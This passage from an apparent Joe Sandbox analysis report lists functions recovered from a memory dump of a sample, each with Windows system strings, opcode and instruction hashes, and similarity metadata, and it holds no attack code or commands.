                                                                                          • Opcode Fuzzy Hash: 61ed1003f6d4e3b26bf179b652a7747693b6422c3659a334cbcad4932b323db5
                                                                                          • Instruction Fuzzy Hash: C9E18B71E40218AFEB21EFD6D990B9EB7B9FF18350F11407AEA00EB252D7749940EB51
                                                                                          Function 2A10A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$`
                                                                                          • API String ID: 0-197956300
                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                          • Instruction ID: 3e7706858745ef063098398e56e08fbfc1210e728e033883008272bf4bbd9aa2
                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                          • Instruction Fuzzy Hash: 0CC1DF712043429BD724DF24C841BABBBE5BF84368F058A2CFA95CB2D1D775D605CB82
                                                                                          Function 2A0E2F60 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 2A0E3011
                                                                                          • , xrefs: 2A0E32B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                          • API String ID: 0-4088147954
                                                                                          • Opcode ID: 33a25999b7e1d96b1555c9a16c5b39b44024abd11b4fe3a63997a20b9fcce73d
                                                                                          • Instruction ID: 3238ecdf27f5f00629d5d1e570b7455c2077dedf832f64e4fe85a27b17f87da5
                                                                                          • Opcode Fuzzy Hash: 33a25999b7e1d96b1555c9a16c5b39b44024abd11b4fe3a63997a20b9fcce73d
                                                                                          • Instruction Fuzzy Hash: 5EC1BC31608341AFD710EF21D690B1BBBE5AFD8704F0149BDEA988B241DBB5D944EB93
                                                                                          Function 2A04AC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpResGetMappingSize Exit, xrefs: 2A04AC7C
                                                                                          • LdrpResGetMappingSize Enter, xrefs: 2A04AC6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                          • API String ID: 0-1497657909
                                                                                          • Opcode ID: 0cc4c8c5cd888db238b21a4e52a7a2343c6154fae7962ccd1351452a4f71db26
                                                                                          • Instruction ID: eb8b0c717135297774694d2e002f7408810df3615ac765392a2d8f88fa77ad85
                                                                                          • Opcode Fuzzy Hash: 0cc4c8c5cd888db238b21a4e52a7a2343c6154fae7962ccd1351452a4f71db26
                                                                                          • Instruction Fuzzy Hash: 7F61F175E04A449FEB11EFAAD880B8EB7F4FF18750F010179EA12AB291D774D900D721
                                                                                          Function 2A0E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$MUI
                                                                                          • API String ID: 0-17815947
                                                                                          • Opcode ID: 638c653745279b270bd426f0aa6ea66ad857ef9ef6ab83bc9ddcf8c056624696
                                                                                          • Instruction ID: 810fc45ac4d2fa573048ca9bd5c7cf3f6b3efc973463ad073a4290f122ddb886
                                                                                          • Opcode Fuzzy Hash: 638c653745279b270bd426f0aa6ea66ad857ef9ef6ab83bc9ddcf8c056624696
                                                                                          • Instruction Fuzzy Hash: CF5168B1E4021DAFDB01EFA4CD80EEEBBF8EB08754F010129E615B7281D6329E05DB60
                                                                                          Function 2A074C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$Flst
                                                                                          • API String ID: 0-758220159
                                                                                          • Opcode ID: cf1a60a7f247dcb871c64ded25d31c50ec95484f61659880c2be0d7f49ef68e1
                                                                                          • Instruction ID: cb7da1d5077e23463c5a84343eb2939509c7c66fecf1414a28b5316df1374eb3
                                                                                          • Opcode Fuzzy Hash: cf1a60a7f247dcb871c64ded25d31c50ec95484f61659880c2be0d7f49ef68e1
                                                                                          • Instruction Fuzzy Hash: 29518AB1E002188FCB14EF99D98469DFBF4EF44714F25807AD0899B252E772DE85DB88
                                                                                          Function 2A072E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 2A0B280C
                                                                                          • RtlpInsertAssemblyStorageMapEntry, xrefs: 2A0B2807
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                          • API String ID: 0-2104531740
                                                                                          • Opcode ID: 935fa1a4afd78cd7b891bb3b558abfaa7d38950323e93d92d8d0f6bbcf8b7c13
                                                                                          • Instruction ID: c885639d96645efcffb51530d984a02b680241e08f5bd2df2d5b191c57bfc292
                                                                                          • Opcode Fuzzy Hash: 935fa1a4afd78cd7b891bb3b558abfaa7d38950323e93d92d8d0f6bbcf8b7c13
                                                                                          • Instruction Fuzzy Hash: 3141EDB5640605EBD724EF55C980E6AF3B5EF9CB10F228479E9448B640E770E941CBA4
                                                                                          Function 2A04A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 2A04A309
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 2A04A2FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          • API String ID: 0-2876891731
                                                                                          • Opcode ID: 3cf75fdd25ee1d2bfa57ef1867c3b4324924d1f53d49bbcbd4dc4b680a13d417
                                                                                          • Instruction ID: cd4ed78e4857da8ebc1357f08982932e6fb1b71a51e028449460ff31ba9bfaa2
                                                                                          • Opcode Fuzzy Hash: 3cf75fdd25ee1d2bfa57ef1867c3b4324924d1f53d49bbcbd4dc4b680a13d417
                                                                                          • Instruction Fuzzy Hash: 9741CF31A04645DBDB11EFAAD880B9EB7F4FF89701F2140B5EA00DB2A2E375DA40DB51
                                                                                          Function 2A080FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 2A081025
                                                                                          • @, xrefs: 2A081050
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                          • API String ID: 0-2976085014
                                                                                          • Opcode ID: 77273779e4d1c8de752fa73d70e49cad2a013a5bd78d29fa681f6c433878abd2
                                                                                          • Instruction ID: 3dfb6d90ce3d536179916167ebce77f2a1d2f8e75d0db8fcd388467470468f27
                                                                                          • Opcode Fuzzy Hash: 77273779e4d1c8de752fa73d70e49cad2a013a5bd78d29fa681f6c433878abd2
                                                                                          • Instruction Fuzzy Hash: 1531D4B2940188AFCB12EFA5CD94E9FBBBCEF98750F010565E500A7251D774DD05CBA4
                                                                                          Function 2A042FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PATH
                                                                                          • API String ID: 0-1036084923
                                                                                          • Opcode ID: d5f6148dc9bf5aecff1cea6ebceb5648ad171f86b6947146fd7ef13b9bea7fc3
                                                                                          • Instruction ID: 089e0fcd055ecd5cc85f68eb4dace0a59266713a6d4cd1968b3732d7f64b111f
                                                                                          • Opcode Fuzzy Hash: d5f6148dc9bf5aecff1cea6ebceb5648ad171f86b6947146fd7ef13b9bea7fc3
                                                                                          • Instruction Fuzzy Hash: CEF1B171E00218EBCB15EF99E880AAEBBF1FF88710F5550B9E940EB250D774AD41CB56
                                                                                          Function 2A0DCC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w
                                                                                          • API String ID: 0-476252946
                                                                                          • Opcode ID: 81985a4e279a84e37f24368fa2605d5af94dceb68478f7fb32a04af088995495
                                                                                          • Instruction ID: cb700e2e439e76db6878e13b9a07c548354a54501e9ffd185c20cf291f2a7a3e
                                                                                          • Opcode Fuzzy Hash: 81985a4e279a84e37f24368fa2605d5af94dceb68478f7fb32a04af088995495
                                                                                          • Instruction Fuzzy Hash: 73D1BE72900B15EBCB18DF64C881ABEFBF1FF84704F148469E8999B251E335E992D750
                                                                                          Function 2A0E4C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                          • Instruction ID: 406575d7ac0dab4de19899df8e874974917e33dd5fcf651a7b9e4634d8347cb1
                                                                                          • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                          • Instruction Fuzzy Hash: 8FA18CB1E4120AAFDB15EFA4DA90AAEB7F8FF1C740F114039EA04A7341E7729900DB54
                                                                                          Function 2A0EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: d290675a31ebe4b5d687a8cd056d044896d1657b26c5fabfdf6898cf38664be2
                                                                                          • Instruction ID: b8455666d950d581addf847e20549faccccafb06267d9c17924ae94270bd5a82
                                                                                          • Opcode Fuzzy Hash: d290675a31ebe4b5d687a8cd056d044896d1657b26c5fabfdf6898cf38664be2
                                                                                          • Instruction Fuzzy Hash: D791FF32940608BFDB22AFA0DE44F9FBBB9EF45740F140029F508A7252EB759901EF95
                                                                                          Function 2A0E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .mui
                                                                                          • API String ID: 0-1199573805
                                                                                          • Opcode ID: b1099c0aa87e8dd5355875154cf2e4eb7875f36b9a6f0c4cb47e95d2d431ec95
                                                                                          • Instruction ID: f76a10336239ac2a53eba22d5ba4a70e3d9c01f7e0fdbb31a279cc96bdb4f85f
                                                                                          • Opcode Fuzzy Hash: b1099c0aa87e8dd5355875154cf2e4eb7875f36b9a6f0c4cb47e95d2d431ec95
                                                                                          • Instruction Fuzzy Hash: 5551B5B2D01229DFCB10EF99D940AAEB7B5BF18A10F06417AE914BB341D3779D01DBA4
                                                                                          Function 2A03CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AlternateCodePage
                                                                                          • API String ID: 0-3889302423
                                                                                          • Opcode ID: 6aa3cb24cbef9b7b7012c3a9646b2c15571e3b4ba4ad98fc7ceb123a8387d72e
                                                                                          • Instruction ID: 17e1a05ce5d5ab128b73c3dc6d99abf983af3be7f05392498b0cdabc880c61bc
                                                                                          • Opcode Fuzzy Hash: 6aa3cb24cbef9b7b7012c3a9646b2c15571e3b4ba4ad98fc7ceb123a8387d72e
                                                                                          • Instruction Fuzzy Hash: 4541B3B6E00209ABEF14EB95DC80AEEBBF8FF84710F11417AE511E7250D6749B82DB50
                                                                                          Function 2A0BCCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TrustedInstaller
                                                                                          • API String ID: 0-565535830
                                                                                          • Opcode ID: ded693afcaf3d4a140d8e7360f7acaea655e8ae390f3ba62cf6f5382b27f6b6e
                                                                                          • Instruction ID: 545f8cef4ca6abf14b046a40c6fa45ed7930371c6c343c1d1df2fb079a6c8be3
                                                                                          • Opcode Fuzzy Hash: ded693afcaf3d4a140d8e7360f7acaea655e8ae390f3ba62cf6f5382b27f6b6e
                                                                                          • Instruction Fuzzy Hash: 1A31C236940218BFDB12AB94CC40FEF7BB9EB58740F020475FA00AB151D675DE42CB90
                                                                                          Function 2A0D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #
                                                                                          • API String ID: 0-1885708031
                                                                                          • Opcode ID: 7f3bf95c1ade36491a3c8235cb6199a6a299fbd7f3d383d52f0a8e86fe272b54
                                                                                          • Instruction ID: 2cc460809b2a89a5dcb88508cafef1e3412d1f17c55f59c8427236de6e8be18f
                                                                                          • Opcode Fuzzy Hash: 7f3bf95c1ade36491a3c8235cb6199a6a299fbd7f3d383d52f0a8e86fe272b54
                                                                                          • Instruction Fuzzy Hash: A9312633610B589BD722EFA5C850BEE77E8DF04704F114078EA41AB2A2DB76E905CB54
                                                                                          Function 2A0E0F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                          • Instruction ID: eec19f2840c93bcf55b0bfbb33cb6b6592091cee25a3df1727443004b9ae6eda
                                                                                          • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                          • Instruction Fuzzy Hash: F631A1B1058345AFD314DF14C845E9FBBE8EF94750F404A2EF59487290E7B0E908DB96
                                                                                          Function 2A0BCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryName
                                                                                          • API String ID: 0-215506332
                                                                                          • Opcode ID: 74d6a35a72ee9aa18764fc1ee43afc225e5f6e8d96fdedae8a173ed2d439b6e6
                                                                                          • Instruction ID: e47f2ae30d7201e5faa26c2ba5ca6e1cadfd77b3cfaa77236469494b5af734c3
                                                                                          • Opcode Fuzzy Hash: 74d6a35a72ee9aa18764fc1ee43afc225e5f6e8d96fdedae8a173ed2d439b6e6
                                                                                          • Instruction Fuzzy Hash: 91313536901509EFDB15EB4ACA51E6FBBB4EB98710F024579E910A7251D730DE01CBE0
                                                                                          Function 2A0DAEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 2A0DAF2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                          • API String ID: 0-1911121157
                                                                                          • Opcode ID: 2d8527e7f8062c45fd8317e8dd29028a86cf65d2f5f0e17060a0389aa3191c7b
                                                                                          • Instruction ID: 38add9b19743248edfc34eb39d1aae898a1811073d805046434f5465336e2d3a
                                                                                          • Opcode Fuzzy Hash: 2d8527e7f8062c45fd8317e8dd29028a86cf65d2f5f0e17060a0389aa3191c7b
                                                                                          • Instruction Fuzzy Hash: 5731E2B3A05A04AFD700EF65C840F5ABBF5EB48B20F1186B5E614E7691D738AD00CB94
                                                                                          Function 2A068CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: WindowsExcludedProcs
                                                                                          • API String ID: 0-3583428290
                                                                                          • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                          • Instruction ID: 699d27f637cb2f906438535b1989a7c265825d9cda560fa09c59da09342abf20
                                                                                          • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                          • Instruction Fuzzy Hash: 82213436541228BFCB22BA84D840F4F77FDAFA5E94F020072FA049B201CA34CE058BB5
                                                                                          Function 2A0C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 2A0C895E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                          • API String ID: 0-702105204
                                                                                          • Opcode ID: 072ebdfbe32adfcb71fcc2e2d3cf1f0514c652405e1cbdd298604b15dc259673
                                                                                          • Instruction ID: 16e157ca1b4cc3d2e49a75493e66ff47180d35eddc5842a458eed95830c37ebd
                                                                                          • Opcode Fuzzy Hash: 072ebdfbe32adfcb71fcc2e2d3cf1f0514c652405e1cbdd298604b15dc259673
                                                                                          • Instruction Fuzzy Hash: 28012B32200200AFD6147F51DCC4F9E7BABEF816B0B090038E74116052DB28AC48D69E
                                                                                          Function 2A0F6FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Critical error detected %lx, xrefs: 2A0F7027
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Critical error detected %lx
                                                                                          • API String ID: 0-802127002
                                                                                          • Opcode ID: ed47ff4c9ea24a1dbb50fb4ae76a7fc221fe05858c14689aef65246e712f62ba
                                                                                          • Instruction ID: 2ddf2d4cd52fe449c3557425a6df92351b9314e76b826cc244995febc5cd6a44
                                                                                          • Opcode Fuzzy Hash: ed47ff4c9ea24a1dbb50fb4ae76a7fc221fe05858c14689aef65246e712f62ba
                                                                                          • Instruction Fuzzy Hash: 69118776D00308CBDB25EFA4D841BEDFBB1EB04714F20462ED225AB282EB752A01CF15
                                                                                          Function 2A0E2000 Relevance: .8, Instructions: 757COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bc054bbbb5e62c4e0b80d5aee99d586530db54aab6fa324430a927d898c5043c
                                                                                          • Instruction ID: 5dd7730f7950c80740bb78fc72bfde800847a242df502f0e9a5ad4ede7ed8aa5
                                                                                          • Opcode Fuzzy Hash: bc054bbbb5e62c4e0b80d5aee99d586530db54aab6fa324430a927d898c5043c
                                                                                          • Instruction Fuzzy Hash: 3E42E9726083409FDB15EF64CA90A2FF7E5BB8C300F05093EFA8A87251D671E945EB52
                                                                                          Function 2A052840 Relevance: .6, Instructions: 605COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 09118e2c127e93b66e9dde5b730f1a83bbde0e3cc936a797a15a02bc7c4953da
                                                                                          • Instruction ID: 3057e1fc73003c44faed4d5b27db495b203ca40e08b9575595cdec1ccf194f68
                                                                                          • Opcode Fuzzy Hash: 09118e2c127e93b66e9dde5b730f1a83bbde0e3cc936a797a15a02bc7c4953da
                                                                                          • Instruction Fuzzy Hash: 0932F170A007559FDB24EFE5C844BAEBBF6BF88704F10412DD6899B382D779A942CB50
                                                                                          Function 2A0EA118 Relevance: .6, Instructions: 591COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8c53aab2cd8d72d74fe7770ed21c7bd4abf94e54a606b66604164beeb76f5c85
                                                                                          • Instruction ID: 26859edac861a67a150e086af72aeaf8acb9fde8940782db7d1248a7cbccb454
                                                                                          • Opcode Fuzzy Hash: 8c53aab2cd8d72d74fe7770ed21c7bd4abf94e54a606b66604164beeb76f5c85
                                                                                          • Instruction Fuzzy Hash: 3E2212706006509FD724EF2AD290776B7F1AF4D342F0584BAE99E8F286D374D542EB60
                                                                                          Function 2A068DBF Relevance: .6, Instructions: 554COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9b0dda5b84e67fd6ce46b86d0c87bde8e75691b2b85655164fc5bd5d9a83524c
                                                                                          • Instruction ID: 40c957d6f360e5a071d2721f4b6dfd7e44796f262e5bc3a800e799481c8c6bf5
                                                                                          • Opcode Fuzzy Hash: 9b0dda5b84e67fd6ce46b86d0c87bde8e75691b2b85655164fc5bd5d9a83524c
                                                                                          • Instruction Fuzzy Hash: 0422A370E00216DFCB18DF95D490AAEFBF2FF48704B1580AAE9459B202E774DE51DBA4
                                                                                          Function 2A046A50 Relevance: .5, Instructions: 548COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
